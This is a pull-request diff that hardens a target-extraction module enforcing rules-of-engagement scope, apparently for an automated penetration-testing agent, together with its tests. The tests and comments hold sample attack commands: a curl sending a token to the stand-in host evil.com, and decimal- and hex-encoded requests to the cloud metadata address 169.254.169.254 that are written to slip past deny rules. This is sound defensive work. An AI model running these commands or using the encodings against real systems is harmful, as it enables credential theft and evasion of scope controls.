Skip to content
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
94 changes: 79 additions & 15 deletions packages/decepticon/decepticon/middleware/_command_targets.py
Original file line number Diff line number Diff line change
Expand Up @@ -30,10 +30,23 @@
import re
import shlex
from collections.abc import Callable
from urllib.parse import urlsplit

_IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
_CIDR_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}/\d{1,2}\b")
_URL_RE = re.compile(r"\b(?:https?|ftp|file|smb|nfs|ssh|rdp|ldaps?)://([^\s/:]+)", re.IGNORECASE)
# Capture the whole authority (up to the path/query/fragment/whitespace), NOT
# just the leading ``[^\s/:]+`` slice. The old slice stopped at the first ``:``
# and never crossed ``@``, so ``scheme://in-scope@evil.com/`` yielded the
# in-scope userinfo (or nothing) instead of the real connect host ``evil.com``
# — a scope-enforcement bypass. ``_host_from_authority`` then RFC-3986-splits
# off userinfo + port and de-brackets IPv6 literals.
_URL_AUTHORITY_RE = re.compile(
r"\b(?:https?|ftp|file|smb|nfs|ssh|rdp|ldaps?)://([^\s/\\?#]+)", re.IGNORECASE
)
# Threshold above which a bare decimal host is treated as a packed IPv4 integer
# (e.g. ``http://2852039166/`` == 169.254.169.254) rather than a port/number.
# 2**24 keeps small integers (ports, counts) from being mangled into IPs.
_PACKED_IPV4_MIN = 1 << 24
_HOSTNAME_AFTER_VERB_RE = re.compile(
r"\b(?:curl|wget|httpx|nmap|masscan|rustscan|ssh|scp|sftp|rsync|"
r"smbclient|smbmap|crackmapexec|nxc|netexec|nikto|sqlmap|hydra|ffuf|"
Expand All @@ -47,10 +60,15 @@
)


# Final labels that mark a token as a local file argument, never a network
# target. No public DNS TLD collides with any of these, so excluding them is
# safe and prevents RoE ENFORCE mode from refusing legitimate commands whose
# option values (``-i key.pem``, ``-oA scan.txt``) look hostname-shaped.
# Final labels that mark a token as a local-file argument, never a network
# target, so RoE ENFORCE mode does not refuse legitimate commands whose option
# values (``-i key.pem``, ``-oA scan.txt``) look hostname-shaped.
#
# SECURITY: an entry here is only safe if it is NOT also a delegated DNS TLD.
# Real TLDs (``.sh`` ``.md`` ``.py`` ``.pl`` ``.pub`` ``.zip`` …) were removed:
# leaving them in silently dropped genuine hosts such as ``evil.zip`` from RoE
# scope enforcement. Over-extracting a spurious target (operator-overridable)
# is safer than dropping a real one.
_NON_TARGET_EXTENSIONS: frozenset[str] = frozenset(
{
"pem",
Expand All @@ -61,7 +79,6 @@
"der",
"p12",
"pfx",
"pub",
"txt",
"log",
"json",
Expand All @@ -76,12 +93,8 @@
"xml",
"html",
"htm",
"md",
"rst",
"sh",
"py",
"rb",
"pl",
"ps1",
"bat",
"pcap",
Expand All @@ -95,7 +108,6 @@
"sqlite",
"sqlite3",
"gz",
"zip",
"tar",
"tgz",
"7z",
Expand Down Expand Up @@ -131,19 +143,71 @@ def _is_valid_target(token: str) -> bool:
return True


def _canon_host(token: str) -> str:
"""Canonicalize a host token so scope matching is encoding-independent.

De-brackets IPv6 literals, normalizes packed integer/hex IPv4 encodings to
dotted-quad, and compresses valid IP literals to their canonical string.
Hostnames pass through lower-cased. This closes the IMDS/forbidden-dest
bypass where ``http://2852039166/`` or ``http://0xa9fea9fe/`` reach
169.254.169.254 without matching a dotted-quad deny rule.
"""
raw = token.strip()
bare = raw[1:-1] if raw.startswith("[") and raw.endswith("]") else raw
if not bare:
return raw.lower()
if ":" not in bare and "." not in bare:
try:
as_int = int(bare, 16) if bare.lower().startswith("0x") else int(bare)
except ValueError:
return bare.lower()
if bare.lower().startswith("0x") or as_int >= _PACKED_IPV4_MIN:
try:
return str(ipaddress.ip_address(as_int))
except ValueError:
return bare.lower()
return bare.lower()
try:
return str(ipaddress.ip_address(bare))
except ValueError:
return bare.lower()


def _host_from_authority(authority: str) -> str | None:
"""Return the real connect host from a URL authority, RFC-3986-correctly.

Drops userinfo (everything through the last ``@``) and the port, and
de-brackets IPv6 literals — so an ``in-scope@evil.com`` decoy can't mask
the true host. Returns None when no host is present.
"""
try:
host = urlsplit("//" + authority).hostname
except ValueError:
return None
return host or None


def _extract_generic(command: str) -> set[str]:
found: set[str] = set()
found.update(_IP_RE.findall(command))
for cidr in _CIDR_RE.findall(command):
found.add(cidr)
for host in _URL_RE.findall(command):
found.add(host)
for authority in _URL_AUTHORITY_RE.findall(command):
host = _host_from_authority(authority)
if host:
found.add(host)
for m in _HOSTNAME_AFTER_VERB_RE.finditer(command):
candidate = m.group(1).rstrip(":,;\"'").lstrip("@")
if candidate.startswith("http"):
continue
found.add(candidate)
return {t for t in found if _is_valid_target(t)}
if ":" in candidate and not _looks_ipv6(candidate):
# A compound option value (e.g. ``--resolve host:port:ip``) is
# captured as one token; split on ``:`` so each piece is validated
# independently instead of emitting a junk ``host:port:ip`` target.
found.update(candidate.split(":"))
else:
found.add(candidate)
return {c for t in found if (c := _canon_host(t)) and _is_valid_target(c)}


def _extract_nmap_targets(command: str) -> set[str]:
Expand Down
Original file line number Diff line number Diff line change
@@ -0,0 +1,70 @@
from decepticon.middleware._command_targets import extract_targets


def test_userinfo_decoy_yields_real_host_not_in_scope_label():
targets = extract_targets("curl http://in-scope.acme.com@evil.com/")
assert targets == {"evil.com"}


def test_userinfo_with_password_decoy_yields_real_host():
targets = extract_targets("curl https://api.acme.com:tok@evil.com/exfil")
assert targets == {"evil.com"}


def test_decimal_encoded_imds_normalized_to_dotted_quad():
targets = extract_targets("curl http://2852039166/latest/meta-data/")
assert "169.254.169.254" in targets


def test_hex_encoded_imds_normalized_to_dotted_quad():
targets = extract_targets("curl http://0xa9fea9fe/latest/meta-data/")
assert "169.254.169.254" in targets


def test_ipv6_literal_url_host_extracted():
targets = extract_targets("curl http://[fd00:ec2::254]/latest/meta-data/")
assert "fd00:ec2::254" in targets


def test_compound_resolve_argument_does_not_emit_junk_token():
targets = extract_targets(
"curl --resolve metadata.google.internal:80:169.254.169.254 "
"http://metadata.google.internal/"
)
assert "169.254.169.254" in targets
assert "metadata.google.internal" in targets
assert "metadata.google.internal:80:169.254.169.254" not in targets


def test_small_integer_host_not_mangled_into_ip():
assert "0.0.31.144" not in extract_targets("curl http://8080/")


def test_plain_url_host_unchanged_regression():
assert extract_targets("curl http://prod.acme.com/path") == {"prod.acme.com"}


def test_url_with_port_strips_port_regression():
assert extract_targets("curl https://prod.acme.com:8443/") == {"prod.acme.com"}


def test_plain_ipv4_target_still_extracted_regression():
assert "10.0.0.5" in extract_targets("nmap -sV 10.0.0.5")


def test_cidr_target_preserved_regression():
assert "10.0.0.0/24" in extract_targets("nmap -sn 10.0.0.0/24")


def test_tld_colliding_hosts_not_dropped_by_extension_denylist():
assert extract_targets("curl https://evil.zip/") == {"evil.zip"}
assert extract_targets("curl https://target.sh/") == {"target.sh"}
assert extract_targets("curl https://pay.md/") == {"pay.md"}
assert extract_targets("curl https://exploit.py/") == {"exploit.py"}
assert extract_targets("curl https://domain.pl/") == {"domain.pl"}
assert extract_targets("curl https://docs.pub/") == {"docs.pub"}


def test_genuine_local_file_argument_still_excluded():
assert extract_targets("nmap -oA key.pem 10.0.0.1") == {"10.0.0.1"}
assert extract_targets("nmap -oA scan.txt 10.0.0.1") == {"10.0.0.1"}
Loading